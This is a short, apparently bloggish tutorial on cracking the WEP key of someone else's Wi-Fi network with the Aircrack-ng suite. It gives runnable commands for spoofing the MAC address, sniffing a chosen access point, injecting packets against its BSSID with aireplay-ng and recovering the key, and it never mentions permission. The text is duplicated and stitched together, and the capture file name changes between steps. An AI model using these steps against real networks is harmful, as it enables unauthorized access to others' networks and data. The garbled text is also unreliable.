17.04.10 - Crack WIFI network's WEP password with Aircrack
How to crack a WIFI network's WEP password with Aircrack suite
The first step is to download the Aicrack-ng suite.
In order to decrypt the WEP key we have to follow the next simple steps:
First, change your hardware address (MAC):
Now, start package monitoring in the wifi interface (for ex: wlan0), for it, we have to use airmon-ng tool:
At this point we need the data necessary to attack the interested network, we will obtain it with:
It will prompt something like this:
This step is only to get the information to attack the net. From all the networks, probably the best choose will be the one with the less power (PWR column). Once we have chosen one of those, we have to remember the blue data, the BSSID (MAC address of the Access point), PWR (Power of the signal), CH (Channel of the network), ENC and CIPHER (Network security type) and ESSID (Access Point name).
Once we have all the data needed to crack the wifi we can start sniffing packages of the interested network. In our case we have selected "WLAN_DF", in channel 2 with BSSID 00:23:F8:A0:C4:A2:
At this point we only have to wait to collect about 20000 - 40000 packages, it depends from the network use.
In order to decrypt the WEP key we have to follow the next simple steps:
First, change your hardware address (MAC):
# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:11:22:33:44:55
# ifconfig wlan0 hw ether 00:11:22:33:44:55
# airmon-ng start wlan0
# airodump-ng wlan0
This step is only to get the information to attack the net. From all the networks, probably the best choose will be the one with the less power (PWR column). Once we have chosen one of those, we have to remember the blue data, the BSSID (MAC address of the Access point), PWR (Power of the signal), CH (Channel of the network), ENC and CIPHER (Network security type) and ESSID (Access Point name).
Once we have all the data needed to crack the wifi we can start sniffing packages of the interested network. In our case we have selected "WLAN_DF", in channel 2 with BSSID 00:23:F8:A0:C4:A2:
# airodump-ng -c 2 -w packages --bssid 00:23:F8:A0:C4:A2 wlan0
Optional, package injection
If our wifi driver supports package injection we can increase the speed of package collection using the aireplay-ng tool. The use of it is:# aireplay-ng -1 0 -a 00:23:F8:A0:C4:A2 -h 00:11:22:33:44:55 -e WLAN_DF wlan0
# aireplay-ng -3 -b 00:23:F8:A0:C4:A2 -h 00:11:22:33:44:55 wlan0
# aireplay-ng -3 -b 00:23:F8:A0:C4:A2 -h 00:11:22:33:44:55 wlan0
Getting the network key
Once recollected a good amount of packages (20000 - 40000) we can try to decrypt the key with the final tool, aircrack-ng:# aircrack-ng paquetes-01.cap
Download: Aircrack-ng
THANK A LOT